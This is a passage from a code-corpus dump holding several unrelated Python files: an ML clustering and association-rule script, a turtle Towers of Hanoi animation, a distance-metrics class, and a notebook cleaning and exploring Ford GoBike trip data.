Features:\")\nprint(selected_features_rf)\n\nX=X[selected_features_rf]\n\n\n\npca = PCA(n_components=2)\npca.fit(X)\nX_transform = pca.transform(X)\n# Label encoding\nlabel_encoder = LabelEncoder()\ny = label_encoder.fit_transform(y)\n\n\n\nk_values = []\naccuracy_scores = []\n\n# Function to calculate WCSS for a range of k values\ndef calculate_wcss(X, k_range):\n wcss_values = []\n for k in k_range:\n kmeans = KMeans(n_clusters=k, init='k-means++', max_iter=300, n_init=10, random_state=0)\n kmeans.fit(X,y)\n wcss_values.append(kmeans.inertia_)\n return wcss_values\n\n# Range of k values to try\nk_values = range(1, 50) # You can adjust the range as needed\n\n# Calculate WCSS values\nwcss = calculate_wcss(X_transform,k_values)\n\n# Plotting WCSS values for different k values\nplt.plot(k_values, wcss, marker='o', linestyle='-', color='b')\nplt.title('Elbow Method For Optimal k (KMeans)')\nplt.xlabel('Number of Clusters (k)')\nplt.ylabel('Within-Cluster Sum of Squares (WCSS)')\nplt.savefig(\"Elbow_kmeans.jpg\", dpi=300)\nplt.tight_layout()\nplt.show()\n\n# K-means clustering with Silhouette analysis\nsilhouette_scores = []\nk_values = range(2, 10)\n\nfor k in k_values:\n kmeans = KMeans(n_clusters=k, random_state=42)\n kmeans.fit(X_transform)\n labels = kmeans.labels_\n silhouette_avg = silhouette_score(X_transform, labels)\n silhouette_scores.append(silhouette_avg)\n\n# Plot Silhouette scores for different k values\nplt.plot(k_values, silhouette_scores, marker='o', linestyle='-', color='b')\nplt.xlabel('Number of Clusters (k)')\nplt.ylabel('Silhouette Score')\nplt.title('Silhouette Analysis for K-means Clustering')\nplt.grid(True, linestyle='--', alpha=0.6)\nplt.savefig(\"silhouette.jpg\", dpi=300)\nplt.show()\n\n# K-means clustering with optimal k\noptimal_k = k_values[np.argmax(silhouette_scores)]\nkmeans = KMeans(n_clusters=optimal_k, random_state=42)\nkmeans_labels = kmeans.fit_predict(X_transform)\n\n# Plotting the clusters with distinct colors\nfor cluster in range(optimal_k):\n cluster_points = X_transform[kmeans_labels == cluster]\n plt.scatter(cluster_points[:, 0], cluster_points[:, 1], label=f'Cluster {cluster + 1}', edgecolor='k')\n\nplt.scatter(kmeans.cluster_centers_[:, 0], kmeans.cluster_centers_[:, 1], s=300, c='red', marker='X', label='Centroids')\nplt.title(f'K-means Clustering (k={optimal_k})')\nplt.xlabel('Feature 1')\nplt.ylabel('Feature 2')\nplt.legend()\nplt.savefig(\"Kmeans.jpg\", dpi=300)\nplt.show()\n\n# dbscan = DBSCAN(eps=1.5, min_samples=15)\n# #dbscan = DBSCAN(eps=.5, min_samples=20)\n# dbscan_labels = dbscan.fit_predict(X_transform)\n#\n# # Plotting the clusters with distinct colors\n# unique_labels = np.unique(dbscan_labels)\n#\n# for label in unique_labels:\n# if label == -1: # Noise points in DBSCAN\n# noise_points = X_transform[dbscan_labels == label]\n# plt.scatter(noise_points[:, 0], noise_points[:, 1], label='Noise', color='gray', edgecolor='k', alpha=0.3)\n# else:\n# cluster_points = X_transform[dbscan_labels == label]\n# plt.scatter(cluster_points[:, 0], cluster_points[:, 1], label=f'Cluster {label + 1}',edgecolor='k')\n#\n# plt.title('DBSCAN Clustering')\n# plt.xlabel('Feature 1')\n# plt.ylabel('Feature 2')\n# plt.legend()\n# plt.show()\n\n# Apriori algorithm (Association Rule Mining)\n# Create a binary dataset for association rule mining\nimport pandas as pd\nfrom mlxtend.preprocessing import TransactionEncoder\nfrom mlxtend.frequent_patterns import apriori, association_rules\n\ndf= pd.read_csv('/home/grads/mshutonu/ML_Project/Phase 1/smoking_driking_dataset_Ver01.csv')\nprint(df.head())\ndata=df.sample(n=60000, random_state=42)\n\n#data = data[['SMK_stat_type_cd', 'DRK_YN', 'sex_1', 'hear_left_2.0', 'hear_right_2.0', 'urine_protein_2.0', 'urine_protein_3.0', 'urine_protein_4.0', 'urine_protein_5.0', 'urine_protein_6.0']]\ndata = data[['SMK_stat_type_cd', 'DRK_YN', 'sex', 'hear_left','hear_right', 'urine_protein']]\n\ndata=pd.get_dummies(data )\n# Convert boolean values to 0 and 1\nchange = {False: 0, True: 1}\ndata = data.replace(change)\n\n# Applying Apriori\na = TransactionEncoder()\na_data = a.fit(data).transform(data)\n#a_data=data\ndf = pd.DataFrame(a_data, columns=a.columns_)\n\nprint(\"Processed Data:\")\nprint(data.head())\n\nprint(\"\\nDataFrame after Apriori:\")\nprint(df.head())\n\n# ===============================\n# Applying Apriori and Resulting\n# ==============================\ndf_frequent = apriori(df, min_support=0.0001, use_colnames=True, verbose=1)\nprint(\"\\nDataFrame with Frequent Itemsets:\")\nprint(df_frequent.head().to_string())\n\n# Check if df_frequent is not empty before generating association rules\nif not df_frequent.empty:\n df_ar = association_rules(df_frequent, metric='confidence', min_threshold=0.6)\n df_ar = df_ar.sort_values(['confidence', 'lift'], ascending=[False, False])\n print(\"\\nAssociation Rules:\")\n print(df_ar.to_string())\nelse:\n print(\"No frequent itemsets found. Check your data and support threshold.\")\n\n# te = TransactionEncoder()\n# te_ary = te.fit(dataset).transform(dataset)\n# df = pd.DataFrame(te_ary, columns=te.columns_)\n#\n# # Apply Apriori algorithm\n# frequent_itemsets = apriori(df, min_support=0.2, use_colnames=True)\n#\n# # Generate association rules\n# rules = association_rules(frequent_itemsets, metric='confidence', min_threshold=0.5)\n#\n# # Display the results\n# print(\"Frequent Itemsets:\")\n# print(frequent_itemsets)\n#\n# print(\"\\nAssociation Rules:\")\n# print(rules)\n\n\n# # Selecting specific columns\n# df = df[['DRK_YN', 'SMK_stat_type_cd']]\n# df['DRK_YN'] = label_encoder.fit_transform(df['DRK_YN'])\n# df['SMK_stat_type_cd'] = label_encoder.fit_transform(df['SMK_stat_type_cd'])\n# df.replace(2, 1, inplace=True)\n#\n# # Apply Apriori algorithm\n# frequent_itemsets = apriori(df, min_support=0.1, use_colnames=True)\n# rules = association_rules(frequent_itemsets, metric='confidence', min_threshold=0.7)\n#\n# # Display the association rules\n# print('Association Rules:')\n# print(rules.to_string())\n","repo_name":"sm5190/ML_Term_Project","sub_path":"phase4.py","file_name":"phase4.py","file_ext":"py","file_size_in_byte":11158,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"31466868743","text":"import random\r\nimport turtle\r\nt = turtle\r\nt.shape(\"turtle\")\r\n\r\ndef main():\r\n n = 8 #Disk Control\r\n p1x, p1y = -200, 0 #Peg 1 distance (need to set height to start turtle stack)\r\n p2x = 0 #Peg 2 X (y depends on current turtles stacked)\r\n p3x = 200 #Peg 3 X (y depends on current turtles stacked)\r\n disk = []\r\n color = []\r\n global actions\r\n actions = []\r\n length = 20*n\r\n pegs(p1x,p1y,length,3)\r\n\r\n t.penup()\r\n t.goto(p1x , p1y)\r\n \r\n for i in range(0, n):\r\n t.pendown()\r\n t.st()\r\n \r\n r1 = random.random()\r\n r2 = random.random()\r\n r3 = random.random()\r\n t.fillcolor(r1, r2, r3)\r\n color.append((r1, r2, r3))\r\n \r\n ID = t.stamp()\r\n disk.append(ID)\r\n \r\n t.penup()\r\n t.ht()\r\n t.sety(16 * (i + 1))\r\n\r\n t.goto(-300,0)\r\n for i in range(0,n):\r\n t.pendown()\r\n t.st()\r\n t.fillcolor(color[i])\r\n t.stamp()\r\n t.ht()\r\n t.penup()\r\n t.sety(16 * (i + 1))\r\n \r\n move(p1x,p2x,p3x,n)\r\n f1 = n\r\n t2 = 0\r\n a3 = 0\r\n t.speed(0)\r\n disk.reverse()\r\n color.reverse()\r\n\r\n\r\n for i in range(0,len(actions),3):\r\n for j in range(1,n + 1): #list is reversed, to go to next highest, must subtract\r\n if actions[i] == (j): #IF DISK = 1-10, converter - disk 8 breaks it, dont know why\r\n print(\"Move Disk:\",j)\r\n actions[i] = disk[j - 1]\r\n x = j-1\r\n t.fillcolor(color[j-1])\r\n \r\n \r\n fromPeg = actions[i + 1]\r\n if fromPeg == p1x: #Goto the frompeg to smooth out graphics\r\n #without it, it feels laggy and has random pauses / surges\r\n t.goto(fromPeg, f1*16) \r\n f1 -= 1\r\n elif fromPeg == p2x:\r\n t.goto(fromPeg, t2*16)\r\n t2 -= 1\r\n else:\r\n t.goto(fromPeg, a3*16)\r\n a3 -= 1\r\n \r\n t.clearstamp(actions[i])\r\n \r\n toPeg = actions[i + 2]\r\n if toPeg == p1x:\r\n t.goto(toPeg, f1*16)\r\n f1 += 1\r\n elif toPeg == p2x:\r\n t.goto(toPeg, t2*16)\r\n t2 += 1\r\n elif toPeg == p3x:\r\n t.goto(toPeg, a3*16)\r\n a3 += 1\r\n\r\n t.st()\r\n disk[x] = t.stamp()\r\n t.ht()\r\n \r\n t.done()\r\n \r\ndef pegs(x1,y1,l,n):\r\n if n == 0:\r\n return\r\n else:\r\n t.penup()\r\n t.goto(x1 , y1)\r\n t.pendown()\r\n t.setheading(90)\r\n t.forward(l)\r\n t.setheading(0)\r\n pegs(x1 + 200, y1, l, n-1)\r\n\r\ndef move(x,y,z,n):\r\n if n == 1:\r\n actions.append(n)\r\n actions.append(x)\r\n actions.append(y)\r\n else:\r\n move(x,z,y,n-1)\r\n actions.append(n)\r\n actions.append(x)\r\n actions.append(y)\r\n move(z,y,x,n-1)\r\n\r\n\r\nmain()\r\n#p,lg,g,dg,\r\n\r\n \r\n","repo_name":"ZachFingar/pyMath","sub_path":"TOH.py","file_name":"TOH.py","file_ext":"py","file_size_in_byte":2940,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"29853221212","text":"\"\"\" Distance Metrics\n\n This module implements distance metrics methods between\n 2 vectors\n\"\"\"\n# Python Imports\nimport math\nfrom typing import List, Union\n\n# Third party imports\nimport numpy as np\n\n# PyQt imports\n\n# My imports\nfrom ..Infrastructure.AlgorithmData import AlgorithmData\nfrom ..AI.Chapter2Normalize import NormalizeData, Normalize\nfrom ..Infrastructure.Enums import FieldsTypes, NormalizeRange, NormalizeMethod\n\n\nclass DistanceMetrics(object):\n \"\"\" Distance Metrics \n\n This class implements 3 types of distance metrics between 2 vectors:\n -# Euclidean distance metrics\n -# Manhattan distance metrics\n -# Chebyshave distance metrics\n\n The distance metrics is done between 2 AlgorithmData. at the beginning of the distance\n metrics methods there is a conversion to AlgorithmData\n\n \"\"\"\n\n def euclidean(self, p, q):\n \"\"\" Euclidean distance metrics\n\n The calculation formula is:\n \\f$\\sqrt{\\sum_{i=0}^n (p_i-q_i)^2}\\f$.\n\n \"\"\"\n p = AlgorithmData(p)\n q = AlgorithmData(q)\n\n sum = 0\n for i in range(p.shape[0]):\n sum += math.pow((p[i, 0] - q[i, 0]), 2)\n sum = math.sqrt(sum)\n return sum\n\n def manhattan(self, p: Union[AlgorithmData, List[float]], q: Union[AlgorithmData, List[float]]):\n \"\"\" Manhatten distance metrics\n\n The calculation formula is:\n \\f$\\sum_{i=0}^n |(p_i-q_i|\\f$.\n \"\"\"\n p = AlgorithmData(p)\n q = AlgorithmData(q)\n sum = 0\n for i in range(p.shape[0]):\n sum += abs(p[i, 0] - q[i, 0])\n return sum\n\n def chebyshave(self, p: Union[AlgorithmData, List[float]], q: Union[AlgorithmData, List[float]]):\n \"\"\" Chevichase distance metrics\n\n The calculation formula is:\n \\f$ max|p_i-q_i|\\f$.\n \"\"\"\n\n p = AlgorithmData(p)\n q = AlgorithmData(q)\n sum = 0\n for i in range(p.shape[0]):\n sum = max(sum, abs(p[i, 0] - q[i, 0]))\n return sum\n\n def select(self, prmOptions: List[List[str]], options: List[List[int]], itemToFind: List):\n\n # Create the normalize data matrix\n normalizeDataMatrix = []\n for prmIdx in range(len(prmOptions)):\n normalizeData = NormalizeData(prmIdx, \"Prm\" + str(prmIdx))\n normalizeData[\"fieldName\"] = \"Prm\" + str(prmIdx)\n normalizeData[\"fieldType\"] = FieldsTypes.NominalData\n normalizeData[\"normalizeMethod\"] = NormalizeMethod.EquilateralEncoding\n normalizeData[\"max\"] = len(prmOptions[prmIdx])\n normalizeData[\"min\"] = 0\n normalizeData[\"normalizeRange\"] = NormalizeRange.ZeroToOne\n normalizeData[\"valuesOrder\"] = [value for value in prmOptions[prmIdx]]\n normalizeData[\"indexInDataFile\"] = prmIdx\n normalizeDataMatrix.append(normalizeData)\n\n # In order to use the normalize method we have to simulate like it came from\n # a file which means :\n # 1. each field has a header\n # 2. The values are strings\n\n # Handle the options matrix\n options = [[str(entry) for entry in row] for row in options]\n prmNameRow = [\"prm\" + str(idx) for idx in range(len(options[0]))]\n options.insert(0, prmNameRow)\n options = np.array(options)\n\n # Convert the itemToFind to a matrix with name row\n itemToFind = [str(entry) for entry in itemToFind]\n itemToFind = [prmNameRow, itemToFind]\n itemToFind = np.array(itemToFind)\n\n normalizeObject = Normalize(options, normalizeDataMatrix)\n optionsNormalized = normalizeObject.normalize()\n\n normalizeObject = Normalize(itemToFind, normalizeDataMatrix)\n itemNormalized = normalizeObject.normalize()\n\n bestDist = float(\"inf\")\n for optionIdx in range(len(optionsNormalized)):\n option = optionsNormalized.rows([optionIdx])\n dist = self.euclidean(option, itemNormalized)\n if dist < bestDist:\n selectedOption = optionIdx\n bestDist = dist\n\n return selectedOption\n","repo_name":"IlanHindy/AI-Learn","sub_path":"AI Project/Project/AI/Chapter3DistanceMetrics.py","file_name":"Chapter3DistanceMetrics.py","file_ext":"py","file_size_in_byte":4153,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"71675662641","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # Dataset - (Ford GoBike System Data)\n# ## by (NWANAGU James Ifeanyichukwu)\n# \n# ## Introduction\n# > This data set includes information about individual rides made in a bike-sharing system covering the greater San Francisco\n# Bay area.\n# \n# \n# ## Preliminary Wrangling\n# > This data contains 183412 Data columns and a total of 16 columns\n\n# In[1]:\n\n\n# import all packages and set plots to be embedded inline\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sb\nimport calendar\n\nget_ipython().run_line_magic('matplotlib', 'inline')\n\n\n# In[2]:\n\n\n# load dataset into pandas\ngobike = pd.read_csv('201902-fordgobike-tripdata.csv')\n\n\n# In[3]:\n\n\n# Overview of data shape and information about the dataset\nprint(gobike.shape)\nprint(gobike.info())\n\n\n# In[4]:\n\n\n# view first five rows of the datasets\ngobike.head()\n\n\n# In[5]:\n\n\n# numerical statistics for the dataset\ngobike.describe()\n\n\n# In[6]:\n\n\n# checking how many rider have the minimum 61 seconds trip duration\ngobike[gobike['duration_sec'] == 61].count()\n\n\n# In[7]:\n\n\n# view 5 minimum duration\ngobike.nsmallest(5, 'duration_sec')\n\n\n# In[8]:\n\n\n# checking how many rider have the maximum 85444 seconds trip duration which is 23:73 hours\ngobike[gobike['duration_sec'] == 85444].count()\n\n\n# In[9]:\n\n\n# displaying the maximum trip duration\ngobike[gobike['duration_sec'] == 85444]\n\n\n# In[10]:\n\n\n# checking for unique values for user_type\ngobike.user_type.unique()\n\n\n# ## Observations\n\n# ### Tidiness Issues\n\n# 1. Age column is absent\n# 2. Month column is absent\n# 3. Day column is absent\n# 4. Time of the day absent\n# 4. The column 'duration_sec' is not conveyed in a clear manner\n# 5. Unwanted columns present in our dataset (start_station_latitude, start_station_longitude, end_station_latitude, end_station_longitude, bike_share_for_all_trip)\n\n# ### Quality Issues\n\n# 1. Missing data\n# 2. Erroneous data type (start_time, end_time, bike_id, user_type, start_station, end_station_id)\n# 3. Improper representation of values (start_station and end_station_id)\n\n# ## Cleaning Data\n\n# ### Create a copy of this dataset\n\n# In[11]:\n\n\nclean_gobike = gobike.copy()\n\n\n# ### Tidiness Issues\n# #### 1. Age column is absent\n\n# ##### Define\n# Create a new 'age' column from the existing 'member_birth_year' using the .apply(lambda) function, so that it is easy to call the age of rider instead of the year of birth. Ps: This data was collected since 2019, therefore our new age column will contain the age of riders in 2019\n\n# ##### Code\n\n# In[12]:\n\n\n# create a new age column for riders\nclean_gobike['age'] = clean_gobike['member_birth_year'].apply(lambda x: 2019 - x)\n\n\n# ##### Test\n\n# In[13]:\n\n\nclean_gobike['age'].describe()\n\n\n# #### 2. Month column is absent\n\n# ##### Define\n# Create a month column from the start_time column using the apply(lambda) function. First we are going to convert the data type of start_time amd end_time to 'datetime'\n\n# ##### Code\n\n# In[14]:\n\n\n# convert start_time and end_time variable to datetime\n# extract month of the year\nclean_gobike[['start_time', 'end_time']] = clean_gobike[['start_time', 'end_time']].apply(pd.to_datetime)\nclean_gobike['start_month'] = clean_gobike['start_time'].apply(lambda time: time.month)\nclean_gobike['start_month'] = clean_gobike['start_month'].apply(lambda x: calendar.month_abbr[x])\n# The start_month column extracted from start_time has just one unique value (Feb)\n\n\n# In[15]:\n\n\nclean_gobike.start_month.unique()\n\n\n# ##### Test\n\n# In[16]:\n\n\nprint(clean_gobike['start_month'].value_counts())\n\n\n# #### 3. Day column is absent\n\n# ##### Define\n# Create day columns from the start_time and end_time columns using the pandas.Series.dt.day_name function\n\n# ##### Code\n\n# In[17]:\n\n\n# create start_day and end_day column\nclean_gobike.insert(2, 'start_day', clean_gobike['start_time'].dt.day_name(), True)\nclean_gobike.insert(4, 'end_day', clean_gobike['end_time'].dt.day_name(), True)\n\n\n# ##### Test\n\n# In[18]:\n\n\nprint(clean_gobike['start_day'].head(5))\nprint(clean_gobike['end_day'].head(5))\n\n\n# #### 4. Time of the day absent\n\n# ##### Define\n# Create time of the day column from the start_time column using the apply(lambda) function. \n\n# ##### Code\n\n# In[19]:\n\n\n# create time of the day column\nclean_gobike['period'] = clean_gobike['start_time'].apply(lambda time: time.hour)\nclean_gobike['day_period'] = 'morning'\nclean_gobike['day_period'][(clean_gobike['period'] >= 12) & (clean_gobike['period'] <= 17)] = 'afternoon'\nclean_gobike['day_period'][(clean_gobike['period'] >= 18) & (clean_gobike['period'] <= 23)] = 'night'\n\n\n# ##### Test\n\n# In[20]:\n\n\nprint(clean_gobike['period'].head(5))\nprint(clean_gobike['day_period'].head(5))\n\n\n# #### 5. The column 'duration_sec' is not conveyed in a clear manner\n\n# ##### Define\n# Convey the duration_sec column in a more clear manner by creating two extra columns (duration_mins and duration_hour)\n\n# ##### Code\n\n# In[21]:\n\n\n# Create additional duration columns and round the values to 2 decimal points\nclean_gobike.insert(1, 'duration_mins', clean_gobike['duration_sec']/60, True)\nclean_gobike['duration_mins'] = round(clean_gobike['duration_mins'], 2)\n\n\n# ##### Test\n\n# In[22]:\n\n\nprint(clean_gobike['duration_mins'].head(5))\n\n\n# #### 6. Unwanted columns present in our dataset \n\n# ##### Define\n# Drop columns that will not be needed in this analysis\n\n# ##### Code\n\n# In[23]:\n\n\n# drop unwanted columns\nclean_gobike.drop(['duration_sec', 'start_station_latitude', 'start_station_longitude', 'end_station_latitude', 'end_station_longitude', 'bike_share_for_all_trip', 'member_birth_year', 'start_month', 'period'], axis = 1, inplace = True)\n\n\n# ##### Test\n\n# In[24]:\n\n\nclean_gobike.info()\n\n\n# ### Quality Issues\n\n# #### 1. Missing data\n\n# ##### Define\n# Drop missing values on our dataset\n\n# ##### Code\n\n# In[25]:\n\n\n# drop rows with missing data\nclean_gobike.dropna(inplace = True)\n\n\n# ##### Test\n\n# In[26]:\n\n\nprint(clean_gobike.isnull().sum().any())\nclean_gobike.shape\n\n\n# #### 2. Erroneous data type\n\n# ##### Define\n# Convert datatypes into a more useful type for our analysis eg: bike_id, age, start_station_id, end_station_id, start_day, end_day, day_period should be converted into a more appropriate and useful type.\n\n# ##### Code\n\n# In[27]:\n\n\n# convert data type\nclean_gobike[['bike_id', 'start_station_id', 'end_station_id']] = clean_gobike[['bike_id', 'start_station_id', 'end_station_id']].astype(str)\nclean_gobike['age'] = clean_gobike['age'].astype(int)\nvariables = {'start_day': ['Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday', 'Sunday'], \n 'end_day': ['Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday', 'Sunday'], \n 'day_period': ['morning', 'afternoon', 'night']}\nfor var in variables:\n order_var = pd.api.types.CategoricalDtype(ordered = True, categories = variables[var])\n clean_gobike[var] = clean_gobike[var].astype(order_var)\n\n\n# ##### Test\n\n# In[28]:\n\n\nclean_gobike.dtypes\n\n\n# #### 3. Improper representation of values\n\n# ##### Define\n# Slice the '.0' attached to the start_station_id and end_station_id values\n\n# ##### Code\n\n# In[29]:\n\n\nclean_gobike['start_station_id'] = clean_gobike.start_station_id.str[:-2]\nclean_gobike['end_station_id'] = clean_gobike.end_station_id.str[:-2]\n\n\n# ##### Test\n\n# In[30]:\n\n\nclean_gobike[['start_station_id', \"end_station_id\"]].head(2)\n\n\n# ### What is the structure of your dataset?\n# \n# > There are 174952 data in the dataset and 14 columns. The start_day, end_day and day_period are all ordered variables.\n# \n# ### What is/are the main feature(s) of interest in your dataset?\n# \n# > I am interested in finding out when and where do riders make the most trip. \n# > What characteristics (age, user_type, gender) influence when riders chose to make those trips. \n# \n# ### What features in the dataset do you think will help support your investigation into your feature(s) of interest?\n# \n# > I expect time of ride variables and station variables to have a significant effect in the number of rides. Riders during the day especially morning, should be much more than riders during afternoon and night time. Also, stations located in a more urbanized location will tend to have more trips than stations located in a less urbanized area, but these assumptions will need more clarification with our analysis. Subscribers are also expected to have more number of rides than customers too because i believe they will be of top priority to the company and their rides will come with bonuses. I assume age, and sex of riders will have significant effect too, as enegetic younger riders, and male riders would tend to have more rides than older riders and female riders respectively. These assumptions will be a subject of our analysis.\n\n# ## Univariate Exploration\n\n# ##### At what time duration did most riders complete their trips?\n\n# In[31]:\n\n\n# numerical statistics for duration\nclean_gobike.duration_mins.describe()\n\n\n# In[32]:\n\n\n# distribution of duration of trips\nbins = np.arange(1, clean_gobike['duration_mins'].max()+100, 100)\nplt.hist(data = clean_gobike, x = 'duration_mins', bins = bins, facecolor = 'g')\nplt.title(\"Distribution of rider's trip duration in minutes\")\nplt.xlabel('Duration (mins)')\nplt.ylabel('Number of trips');\n\n\n# In[33]:\n\n\n# log type numerical statistics for duration\nnp.log10(clean_gobike.duration_mins.describe())\n\n\n# In[34]:\n\n\n# distribution of duration of trips using log transformation\nplt.figure(figsize = (15, 5))\nbins = 10 ** np.arange(0.008, 3.2+0.05, 0.05)\nplt.hist(data = clean_gobike, x = 'duration_mins', bins = bins, facecolor = 'g', rwidth = .7)\nticker = [0, 1, 2, 3, 4, 6, 8, 12, 20, 30, 40, 80]\nlabel = ['{}'.format(v) for v in ticker]\nplt.xscale('log')\nplt.xticks(ticker, label)\nplt.xlim((0.8, 80))\nplt.title(\"Distribution of rider's trip duration in minutes (x-axis limits are changed and scaled to log type)\")\nplt.xlabel('Duration (mins)')\nplt.ylabel('Number of trips');\n\n\n# Most trips were completed between 5 to 13 minutes.\n\n# ##### What station gained the most traffic?\n\n# In[35]:\n\n\n# number of stations present in our data set and their frequency\nnum = clean_gobike['start_station_name'].value_counts().count()\nprint('\\033[32mThere are {} stations present in our dataset\\n'.format(num))\nclean_gobike['start_station_name'].value_counts()\n\n\n# In[36]:\n\n\n# create a subset of first 10 station names with highest frequency\nstation = ['Market St at 10th St', 'San Francisco Caltrain Station 2 (Townsend St at 4th St)', 'Berry St at 4th St', 'Montgomery St BART Station (Market St at 2nd St)', \n 'Powell St BART Station (Market St at 4th St)', 'San Francisco Caltrain (Townsend St at 4th St)', 'San Francisco Ferry Building (Harry Bridges Plaza)', \n 'Howard St at Beale St', 'Steuart St at Market St', 'Powell St BART Station (Market St at 5th St)']\ngobike10 = clean_gobike.loc[clean_gobike['start_station_name'].isin(station)]\n\n\n# In[37]:\n\n\n# number of start stations present in our subset data set and their frequency\nnum = gobike10['start_station_name'].value_counts().count()\nprint('\\033[32mThere are {} start stations present in our dataset\\n'.format(num))\ngobike10['start_station_name'].value_counts()\n\n\n# In[38]:\n\n\n# create a countplot for top 10 stations\nordr = gobike10.start_station_name.value_counts().index\nplt.figure(figsize = (15, 8))\ncolour = sb.color_palette()[2]\nsb.countplot(data = gobike10, y = 'start_station_name', color = colour, order = ordr)\nplt.title('Top 10 stations with most trip')\nplt.ylabel('Stations name');\n\n\n# Market St at 10th St station has the most trips. From [Google Map](https://www.google.com/maps/search/tourist+places/@37.7765395,-122.426281,15z/data=!3m1!4b1!4m8!2m7!3m6!1stourist+places!2sMarket+St+%26+10th+St,+San+Francisco,+CA+94102,+USA!3s0x8085809c174aa0c9:0x17bf51f6fa75b155!4m2!1d-122.4175262!2d37.7765399), this could be as a result of the station being located around Tourist sites and business hubs. Also present are a number of train stations. The second busiest station is San Francisco Caltrain Station 2 (Townsend St at 4th St). Tourist sites and business hubs could also a reason for it busy nature.\n\n# ##### With regards to our top 10 station, at what time duration did most riders complete their trips\n\n# In[39]:\n\n\n# log type numerical statistics for duration\nnp.log10(gobike10.duration_mins.describe())\n\n\n# In[40]:\n\n\n# lets plot the distribution of duration of trips for our top 10 stations with huge traffic using log transformation\nplt.figure(figsize = (15, 5))\nbins = 10 ** np.arange(0.008, 3.2+0.05, 0.05)\nplt.hist(data = gobike10, x = 'duration_mins', bins = bins, facecolor = 'g', rwidth = .7)\nticker = [0, 1, 2, 3, 4, 6, 8, 12, 20, 30, 40, 80]\nlabel = ['{}'.format(v) for v in ticker]\nplt.xscale('log')\nplt.xticks(ticker, label)\nplt.xlim((2, 40))\nplt.title(\"Distribution of rider's trip duration in minutes in top 10 stations (x-axis limits are changed and scaled to log type)\")\nplt.xlabel('Duration (mins)')\nplt.ylabel('Number of trips');\n\n\n# Most of the trip are completed at an average duration of 8 to 12 minutes. This sort of correspond with our earlier plot of duration distribution for our over all dataset\n\n# ##### What is the age range for most riders?\n\n# In[41]:\n\n\n# numerical statistics for age\ngobike10.age.describe()\n\n\n# In[42]:\n\n\n# age distribution in top 10 stations\nplt.figure(figsize = (7, 5))\nbins = np.arange(10, gobike10.age.max()+2, 2)\nplt.hist(data = gobike10, x = 'age', bins = bins, facecolor = 'g', rwidth = 0.8)\nplt.xlabel('Age distribution')\nplt.ylabel('Number of trips');\n\n# from our plot, we can see that our data is skewed to the right. This shows a need for our axis transformation\n\n\n# In[43]:\n\n\nnp.log10(gobike10.age.describe())\n\n\n# In[44]:\n\n\n# age distribution in top 10 station using log scale for the x-axis transformation\nplt.figure(figsize = (15, 5))\nbins = 10 ** np.arange(1.2, 2.2+0.02, 0.02)\nplt.hist(data = gobike10, x = 'age', bins = bins, facecolor = 'g', rwidth = 0.8)\nplt.xscale('log')\nticker = [15, 20, 30, 40, 60, 80, 100, 150]\nplt.xticks(ticker, ticker)\nplt.title('Age Distribution in top 10 stations (x-axis scaled to log type)')\nplt.xlabel('Age')\nplt.ylabel('Number of trips');\n\n\n# From our plot, most trips in the top 10 stations are completed by persons around age 30. It appears there are persons of age 100 and above which i believe are outliers.\n\n# ##### What day do riders prefer most?\n\n# In[45]:\n\n\nprint(gobike10['start_day'].describe())\ngobike10['end_day'].describe()\n\n\n# In[46]:\n\n\nprint(gobike10['start_day'].value_counts())\ngobike10['end_day'].value_counts()\n\n\n# In[47]:\n\n\n# distribution of riders at a particular time\nplt.figure(figsize = (20, 5))\nplt.suptitle('Number of Weekly Rides in Top 10 Stations')\nplt.subplot(1, 2, 1)\ncolour = sb.color_palette()[2]\nsb.countplot(data = gobike10, x = 'start_day', color = colour)\nplt.xlabel('Start Days of the Week')\nplt.ylabel('Number of trips')\n\nplt.subplot(1, 2, 2)\nsb.countplot(data = gobike10, x = 'end_day', color = colour)\nplt.xlabel('End Days of the Week')\nplt.ylabel('Number of trips');\n\n\n# Weekdays appears to have more riders than weekends with Thursday and Tuesday having the highest number of rides. Monday have the least ride for the weekdays. What could be the reasons behind this? \n\n# ##### What time of the day do most riders prefer? \n\n# In[48]:\n\n\ngobike10.day_period.describe()\n\n\n# In[49]:\n\n\ngobike10.day_period.value_counts()\n\n\n# In[50]:\n\n\n# time of the day distribution in top 10 stations\nplt.figure(figsize = (10, 5))\nsb.countplot(data = gobike10, x = 'day_period', color = colour)\nplt.title('Number of Rides for each Time of the Day')\nplt.xlabel('Time of day')\nplt.ylabel('Number of trips');\n\n\n# From our plot, riders make the most trip during the morning and afternoon hours. This could be as a result of working hours duration. Night appears to be the period for least trip. \n\n# ##### What gender and user type make the most trip?\n\n# In[51]:\n\n\nprint(gobike10.member_gender.value_counts())\nprint(gobike10.user_type.value_counts())\n\n\n# In[52]:\n\n\n# plot distribution of gender and user type\nfig, ax = plt.subplots(nrows = 2, figsize = [10, 10])\nsb.countplot(data = gobike10, x = 'member_gender', color = colour, ax = ax[0])\nsb.countplot(data = gobike10, x = 'user_type', color = colour, ax = ax[1])\nax[0].set_title('Number of Trips by Gender')\nax[0].set_xlabel('Gender')\nax[0].set_ylabel('Number of trips')\nax[1].set_title('Number of Trips by User Type')\nax[1].set_xlabel('User type')\nax[1].set_ylabel('Number of trips');\n\n\n# > 1. From our plot, male have the most trip than female, while 'other' have the least ride. What reasons could be behind male riders getting more rides than women rider? \"Other\" variable could be as a result of riders that neither identify as male or female.\n# > 2. From our user type plot, suscribers tend to have the most trip than customers. This could be as a result of greater priority which the company have for subscribers than customers.\n\n# ### Discuss the distribution(s) of your variable(s) of interest. Were there any unusual points? Did you need to perform any transformations?\n# \n# > After performing cleaning operation on our dataset, we had 174952 data with 14 columns.\n# > To avoid over plotting, I created a subset of top 10 stations location with highest ride frequendy to lowest ride frequency that I will be working with. They include;\n# > 1. 'Market St at 10th St', \n# > 2. 'San Francisco Caltrain Station 2 (Townsend St at 4th St)', \n# > 3. 'Berry St at 4th St', \n# > 4. 'Montgomery St BART Station (Market St at 2nd St)', \n# > 5. 'Powell St BART Station (Market St at 4th St)', \n# > 6. 'San Francisco Caltrain (Townsend St at 4th St)', 